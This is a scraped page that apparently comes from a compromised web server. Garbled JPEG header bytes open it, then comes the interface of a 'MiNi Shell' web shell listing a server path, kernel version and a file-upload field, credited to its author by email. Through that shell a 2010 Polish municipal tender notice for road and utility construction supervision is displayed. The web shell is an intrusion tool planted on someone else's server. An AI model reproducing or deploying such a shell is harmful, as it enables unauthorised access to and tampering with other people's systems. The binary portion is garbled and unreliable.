JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/73203-N-2010.html

<p class="kh_header"><b>Międzyrzec Podlaski: Pełnienie obowiązków Inspektora Nadzoru Inwestorskiego przy realizacji zadań dotyczących kompleksowego przygotowania terenu inwestycyjnego nowoczesnych usług              i produkcji w północno-wschodniej części Międzyrzeca Podlaskiego.</b><br>
<b>Numer ogłoszenia: 73203 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Międzyrzec Podlaski , ul. Pocztowa 8, 21-560 Międzyrzec Podlaski, woj. lubelskie, tel. 083 3717789, faks 083 3717790.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków Inspektora Nadzoru Inwestorskiego przy realizacji zadań dotyczących kompleksowego przygotowania terenu inwestycyjnego nowoczesnych usług              i produkcji w północno-wschodniej części Międzyrzeca Podlaskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków Inspektora Nadzoru Inwestorskiego w branży drogowej, sieci elektroenergetycznych i sanitarnej przy realizacji zadań dotyczących kompleksowego przygotowania terenu inwestycyjnego nowoczesnych usług i produkcji w północno-wschodniej części Międzyrzeca Podlaskiego.
1.	Roboty budowlane objęte nadzorem inwestorskim obejmują:

a)	roboty drogowe
- Droga (ulica) główna klasy Z dla ruchu KR3 o szerokości jezdni 7,0 m z obustronnymi chodnikami o szerokości 1,5 m i ścieżką rowerową dwukierunkową o szerokości 2,0 m o długości 1,20 km z trzema skrzyżowaniami z istniejącymi drogami (ulicami) oraz jednym skrzyżowaniem z projektowaną drogą (ulicą)

- Droga (ulica) klasy L dla ruchu KR2 o szerokości jezdni 7,0 m z obustronnymi chodnikami o szerokości 1,5 m o długości 0,35 km z jednym skrzyżowaniem z istniejącą drogą (ulicą)

b)	roboty elektryczne
Sieć energetyczna oświetlenia ulicznego kablowa YAKY 4x50 ÷ 4x35 mm2 o długości 1,58 km, słupy oświetleniowe stalowe z oprawami 150 W - 73 szt.

c)	roboty sanitarne
Sieć wodociągowa z rur PCV O 160 mm o długości 1,55 km
Sieć kanalizacji sanitarnej grawitacyjna z rur PCV O 200 ÷ 300 mm o długości 1,58 km,
Sieć kanalizacji deszczowej z rur PCV: grawitacyjna O 400 ÷ 500 mm - 1,49 km, rurociąg tłoczny O 110 mm - 0,50 km z przepompownią ścieków, z ulicznymi wpustami ściekowymi z przykanalikami - 36 szt.

2.	Koszt robót budowlanych objętych nadzorem inwestorskim określony na podstawie umowy z Wykonawcą zadania pn. Kompleksowe przygotowanie terenu inwestycyjnego nowoczesnych usług i produkcji w północno-wschodniej części Międzyrzeca Podlaskiego.
a)	Wartość netto robót w branży drogowej - 5 904 800,00 zł
b)	Wartość netto robót w branży elektrycznej - 456 768,00 zł
c)	Wartość netto robót w branży sanitarnej - 3 235 440,00 zł.

Wykonawcą robót jest Przedsiębiorstwo Drogowo Mostowe Międzyrzec Podlaski S.A.; ul. Radzyńska 11, 21-560 Międzyrzec Podlaski.

3.	Obowiązki Inspektora Nadzoru:

I. Obowiązki ogólne:
1.	Pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z przepisami polskiego prawa i postanowieniami odpowiednich pozwoleń na prowadzenie budowy.
2.	Monitorowanie przebiegu realizacji zadania oraz niezwłoczne informowanie Zamawiającego o zaistniałych nieprawidłowościach.
3.	Wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją nadzorowanego zadania w zakresie objętym niniejszą umową.
4.	Działanie we współpracy z inwestorem i na jego rzecz w całym okresie realizacji zamówienia, w zakresie określonym w umowie oraz w ofercie.
5.	Zapewnienie stałej wymiany informacji z Zamawiającym oraz koordynacja swojej działalności z wymaganiami Zamawiającego.
6.	Inspektor nadzoru oraz pozostałe osoby wskazane w ofercie powinny być dostępne na każde zasadne wezwanie Zamawiającego lub wykonawcy robót.
7.	Pełna współpraca z projektantem w zakresie kontroli poprawności wykonywanych robót i ich zgodności z dokumentacją, oraz w podejmowaniu ewentualnych decyzji wprowadzenia koniecznych zmian w dokumentacji i przebiegu lub zakresu robót.
II. Etap poprzedzający przejęcie obowiązków inspektora nadzoru:
1)	Przed planowanym terminem przejęcia robót i obowiązków inspektor zapozna się z dokumentacją Zamawiającego w celu sprawdzenia wzajemnej zgodności i kompletności składających się na tę dokumentację dokumentów.
2)	Przeprowadzenie inspekcji terenu budowy w celu sprawdzenia zgodności stanu istniejącego z dokumentacją projektową.
III. Etap budowy:
1.	Sporządzanie na żądanie Zamawiającego raportu o postępie robót, uzyskiwanym poziomie robót, sprawach finansowych, występujących problemach w realizacji umowy o roboty budowlane oraz planem robót i finansów na wskazany okres.
2.	Reprezentowanie Zamawiającego w kontaktach z osobami trzecimi w sprawach związanych z realizacją nadzorowanego zadania w zakresie objętym umową.
3.	Rozliczanie ilości materiałów rozbiórkowych wraz z nadzorowaniem miejsca ich składowania.
4.	Przekazanie wykonawcy robót terenu budowy, wystawienie polecenia rozpoczęcia robót.
5.	Prowadzanie regularnych inspekcji na terenie budowy w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami specyfikacji technicznych, dokumentacji projektowej oraz praktyką inżynierską.
6.	Obecność na budowie minimum raz w tygodniu oraz w szczególnych przypadkach na każde wezwanie Zamawiającego lub Wykonawcy potwierdzone wpisem w dziennik budowy.
7.	Kontrola zgodności postępów realizacji robót z umową o wykonanie robót budowlanych (sprawdzanie czy wydatki i postęp prac są zgodne z harmonogramem).
8.	Informowanie inwestora, gdyby postęp robót budowlanych nie był zadawalający, o wszystkich środkach, które należy podjąć w celu zaradzenia zaistniałej sytuacji oraz wypełnienia zobowiązań wynikających z umowy o roboty budowlane.
9.	Kontrolowanie przestrzegania przez wykonawcę robót zasad bezpieczeństwa pracy i utrzymania porządku na terenie budowy.
10.	Udzielanie wykonawcy robót wszelkich dostępnych informacji i wyjaśnień dotyczących zadania.
11.	Kontrola zgodności oznakowania robót z zatwierdzonym projektem tymczasowej organizacji ruchu;
12.	Wyrażanie zgody na wykonywanie robót w nocy i dni wolne od pracy.
13.	Wnioskowanie o usunięcie z terenu budowy każdej osoby zatrudnionej przez wykonawcę robót, która zachowuje się niewłaściwie lub jest niekompetentna lub niedbała w swojej pracy; organizacja oraz przewodniczenie naradom dotyczącym postępu robót (rad budowy), w których udział biorą przedstawiciele wszystkich zaangażowanych w realizację zadania stron.
14.	Organizowanie narad technicznych oraz sporządzanie protokółów z tych narad i przekazywania ich Zamawiającemu i wykonawcy robót w terminie 5 dni od dnia narady.
15.	Monitorowanie postępu robót poprzez sprawdzanie ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym przy realizacji zadania harmonogramem robót.
16.	Sprawowanie kontroli sposobu składowania i przechowywania materiałów.
17.	Nadzorowanie badań materiałów i robót wykonywanych przez wykonawcę robót.
18.	Zlecanie wykonawcy robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwość co do ich jakości.
19.	Zlecanie wykonania kontrolnych badań laboratoryjnych i pomiarów laboratorium wskazanemu przez Zamawiającego.
20.	Zatwierdzanie rysunków wykonawczych sporządzanych przez wykonawcę robót.
21.	Weryfikowanie rysunków powykonawczych sporządzanych przez Wykonawcę Robót.
22.	Dokonywanie obmiaru wykonanych robót.
23.	Dokonywanie odbioru robót zanikających i ulegających zakryciu.
24.	Sprawdzanie wykonanych robót i powiadomienie wykonawcy robót o wykrytych wadach oraz określenia zakresu koniecznych do wykonania robót poprawkowych.
25.	Poświadczanie usunięcia przez wykonawcę robót wad.
26.	Przygotowywanie do odbioru częściowego i końcowego robót, sprawdzenia kompletności i prawidłowości przedłożonych przez wykonawcę robót dokumentów wymaganych do odbioru oraz uczestnictwo w odbiorze robót.
27.	Sprawdzenie zestawień ilości i wartości wykonanych robót.
28.	Poświadczenie terminu zakończenia robót.
29.	Dostarczeniu Zamawiającemu wszelkich raportów, akt, certyfikatów przygotowanych przez wykonawcę robót po zakończeniu robót.
30.	Zapobieganie roszczeniom wykonawcy robót.
31.	Powiadamianie Zamawiającego o wszelkich roszczeniach wykonawcy robót oraz rozbieżnościach między dokumentacją Zamawiającego, a stanem faktycznym na terenie budowy.
32.	Sprawdzenie ostatecznej kwoty należnej wykonawcy robót.
33.	Rozliczenie umowy o roboty budowlane w przypadku jej wypowiedzenia.
34.	Wydawanie polecenia przyspieszenia lub opóźnienia tempa robót po uzgodnieniu z Zamawiającym.
35.	Wnioskowanie w przypadku konieczności o dokonanie zmian w dokumentacji projektowej wraz z przedłożeniem nowych założeń projektowych i przedmiarem robót z wyliczeniem kosztów odpowiadającym proponowanym zmianom w porównaniu z ofertą wykonywanych robót.
36.	Wystawianie wszelkich niezbędnych dokumentów wymaganych przez instytucje współfinansujące.
37.	Sporządzanie raportów i sprawozdań wymaganych przez Zamawiającego i procedury wdrażania projektu (w zależności od źródła finansowania).
38.	Sporządzenie dokumentacji fotograficznej, dokumentującej postęp budowy; (przed rozpoczęciem robót, w czasie realizacji i po zakończeniu robót),
39.	Udział w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją zadania.
40.	Wykonanie wspólnie z wykonawcą robót harmonogramu rzeczowo-finansowego oraz opracowanie prognoz płatności, zgodnie z wymaganiami umowy o dofinansowanie nadzorowanego zadania.
41.	Rozliczanie nadzorowanego zadania oraz sprawdzania kosztorysów przedstawionych przez wykonawcę.
42.	Przygotowywanie dokumentacji fotograficznej, potwierdzającej wykonanie inwestycji, w tym - w szczególności tzw. robót zanikających
IV. Inspektor nadzoru będzie decydować o:
1.	Dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót.
2.	Zatwierdzeniu receptur i technologii proponowanych przez wykonawcę robót.
3.	Dopuszczeniu do pracy wytwórni mas bitumicznych i betonowych, wytwórni Prefabrykatów oraz sprzętu i środków transportu wykonawcy robót.
4.	Wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z wymaganiami zadania po uzyskaniu akceptacji Zamawiającego.
5.	Sposobie zabezpieczenia wykopalisk odkrytych na terenie budowy.
6.	Wprowadzeniu zmian w dokumentacji projektowej po uzyskaniu zgody Zamawiającego.
7.	Przeprowadzeniu niezbędnych badań i pomiarów lub ekspertyz przez niezależnego inspektora.
V. Inspektor nadzoru będzie akceptować:
1.	Przedstawiony przez wykonawcę robót program zapewnienia jakości Harmonogram robót i harmonogram płatności.
2.	 Propozycję wykonawcy robót odnośnie zmiany kierownika budowy lub robót na inną osobę niż wskazana w ofercie wykonawcy robót.
3.	Źródła pozyskania materiałów miejscowych, o ile nie zostały wskazane w ofercie wykonawcy robót.
VI. Etap po zakończeniu robót:
W okresie zgłaszania wad i bezpośrednio po nim, do zadań inspektora będzie należało:
1.	Finalizacja zadań wynikających z obowiązków na etapie budowy.
2.	Dokonywanie inspekcji i nadzór nad robotami zaległymi oraz robotami niezbędnymi do usunięcia wad.
3.	Odbiór wykonanych robót związanych z usunięciem wad.
4.	Wspieranie zamawiającego w negocjacjach dotyczących nierozstrzygniętych roszczeń i sporów.
Wnioskowanie o zwrot zabezpieczenia należytego wykonania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli wykonawca dysponuje osobami (co 
    najmniej po 1 osobie w nw. specjalnościach)   posiadającymi wymagane  prawem uprawnienia 
     budowlane do nadzorowania i kontrolowania budowy i robót w następujących 
     specjalnościach: drogowej, sieci elektroenergetycznych oraz sanitarnej - wpisanymi do 
     właściwej izby inżynierów budownictwa i posiadającymi aktualne ubezpieczenie od 
    odpowiedzialności cywilnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Międzyrzec Podlaski ul. Pocztowa 8 21-560 Międzyrzec Podlaski pok. 4 w dniach poniedziałek ÷ piątek w godz. 9:00 ÷ 14:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 11:00, miejsce: Urząd Miasta Międzyrzec Podlaski, 21-560 Międzyrzec Podlaski, ul. Pocztowa 8, p.22 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany w ramach Programu Operacyjnego Polski Wschodniej 2007-2013 Osi Priorytetowej I Nowoczesna Gospodarka Działania I.3 Wspieranie Innowacji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com